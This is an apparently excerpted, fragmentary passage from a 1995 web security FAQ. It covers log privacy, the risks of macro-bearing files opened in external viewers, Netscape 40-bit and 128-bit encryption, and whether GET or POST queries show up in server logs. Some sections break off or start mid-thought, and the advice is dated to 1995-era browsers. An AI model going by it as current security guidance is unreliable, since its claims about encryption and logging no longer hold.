In most U.S. states, it is illegal for libraries and video stores to sell or otherwise distribute records of the materials that patrons have checked out. While the courts have yet to apply the same legal standard to be applied to electronic information services, it is not unreasonable for users to have the same expectation of privacy on the Web. In other countries, for example Germany, the law explicitly forbids the disclosure of online access lists. If your site chooses to use the Web logs to populate your mailing lists or to resell to other businesses, make sure you clearly advertise that fact.
The easiest way to avoid collecting too much information is to use a server that allows you to tailor the output logs, so that you can throw away everything but the essentials. Another way is to regularly summarize and discard the raw logs. Since the logs of popular sites tend to grow quickly, you probably will need to do that anyway.
You can protect outsiders by summarizing your logs. You can help protect insiders by:
If your site does not want to reveal certain Web accesses from your site's domain, you may need to get Web client accounts from another Internet provider that can provide anonymous access. Table of contents
These words of warning apply also to the macro worksheets generated by popular PC spreadsheet programs. Although it seems natural to declare a type "application/x-msexcel-macro" in order to receive spreadsheets that automatically recalculate themselves, some of the functions in the Excel macro language have the potential to inflict damage on other worksheets and files. These warnings even apply to such seemingly innocuous things as word processor style sheets and template files! Many high end word processors have a built-in macro processing ability. An example of the way in which word processing macros can be misused is the Microsoft Word "prank macro", which has the ability to spread, virus-like, from document to document.
In short, beware of declaring an external viewer for any file that contains executable statements.
This security problem is addressed by scripting languages as Java and Safe Tcl in which dangerous functions can be disabled. There's even a prototype "Safe Perl" that can be used as a safer external viewer for perl programs.
To turn this warning off, select Preferences from Netscape's Options menu, choose "Images and Security", and uncheck the checkbox labeled "Warn before submitting forms insecurely."
Netscape servers and browsers do encryption using either a 40-bit secret key or a 128-bit secret key. Many people feel that using a 40-bit key is insecure because it's vulnerable to a "brute force" attack (trying each of the 2^40 possible keys until you find the one that decrypts the message). Using a 128-bit key eleiminates this problem because there are 2^128 instead of 2^40 possible keys. Unfortunately, most Netscape users have browsers that support only 40-bit secret keys. This is because of legal restrictions on the encryption software that can be exported from the United States (The Federal Government has recently modified this policy on following the well-publicized cracking of a Netscape message encrypted using a 40-bit key. Expect this situation to change).
In Netscape you can tell what kind of encryption is in use for a particular document by looking at the "document" information" screen accessible from the file menu. The little key in the lower left-hand corner of the Netscape window also indicates this information. A solid key with two teeth means 128-bit encryption, a solid key with one tooth means 40-bit encryption, and a broken key means no encryption. Even if your browser supports 128-bit encryption, it mayse use 40-bit encryption when talking to older Netscape servers or Netscape servers outside the U.S. and Canada.
The contents of queries in forms submitted using the GET request appear in the server log files because the query is submitted as part of the URL. However, when a query is submitted as a POST request (which is often the case when submitting a fill-out form), the data you submit doesn't get logged. If you are concerned about the contents of a keyword search appearing in a public log somewhere, check whether the search script uses the GET or POST method. The easiest technique is to try an innocuous query first. If the contents of the query appear in the URL of the retrieved document, then they probably appear in the remote server's logs too.
Server/browser combinations that use data encryption, such as Netsite/Netscape, encrypt the URL request. Furthermore the encrypted request, because it is submitted as a POST request, does not appear in the server logs.
Last Modified September 9, 1995